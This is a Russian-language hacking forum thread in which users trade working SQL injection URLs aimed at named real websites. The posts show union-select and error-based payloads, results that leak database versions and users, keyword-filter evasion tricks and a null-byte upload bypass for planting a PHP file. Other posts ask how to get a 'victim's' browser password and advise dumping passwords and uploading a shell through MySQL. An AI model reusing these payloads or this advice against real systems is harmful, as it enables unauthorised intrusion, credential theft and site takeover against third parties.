Помогите определить движек http://www.peterjob.ru/ http://www.peterjob.ru/vakancy_search/2/?job_category=5-5%20union%20select%201--
Помогите вывести версию Плиз http://www.nzgeographic.co.nz/articles.php?ID=75+union+select+1,2,3,4,5,6,7--
Code: http://www.nzgeographic.co.nz/articles.php?ID=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+
http://wiki.linuxformat.ru/index.php/LXF90:Apache, для хека даст развечто логины пользователей для последующего брутфорса.
or+1=(/*!select*/+table_name+from+information_schema.tables)-- ругается Line 1: Incorrect syntax near '/'.
Если там банальный str_replace, попробуй с регистром поиграть, т.е (к примеру) Code: sElEcT А если же str_ireplace, тогда так: Code: seselectlect Но не факт что сработает, т.к. все вышесказанное основано лишь на догадках.
Подскажите как мне узнать пароль от сайта в опере, если "жертва" не запоминает пароль и ставит галочку чужой компьютер?
Не могу до конца раскрутить скул: Code: http://www.sixls.com/news.php?id=-3+union+select+1,concat_ws(0x0b, version(), database(), user()),3-- Версия: 5.0.88-community-log Юзер: sixls_com_-_1 База: [email protected] Идут таблицы: Code: http://www.sixls.com/news.php?id=-3+union+select+1,table_name,3+from+information_schema.tables-- Дальше поля: Code: http://www.sixls.com/news.php?id=-3+union+select+1,column_name,3+from+information_schema.columns-- ----------------------------------------- Я искал на форуме и ни как не мог найти инфу о том как выводить поля, которые находятся в определенной таблице, и как из полей выводить нужные данные, например пароль и и мя пользователя. Заранее спасибо =)
как обойти такую конструкцию?) на $row['ID'] могу влиять) сделал $row['ID'] = "1.php%00" получил: Warning: move_uploaded_file(../photos/1.php%00.photo1.jpg) [function.move-uploaded-file]: failed to open stream: Permission denied in /usr/www/users/manager/updateProfile.php on line 814 создать фаил прав не хватает или что то другое?
начал ломать свой первый сайт) обнаружил пути, даже файл с подключением к БД (конфиги) а что дальше?(
подключится к БД и сдампить/вытащить пароли и попробовать к админке сайта или через mysql залить шелл и юзать полноценный шелл .... P.S Зачем ломал то если не знаеш что делать дальше ? ))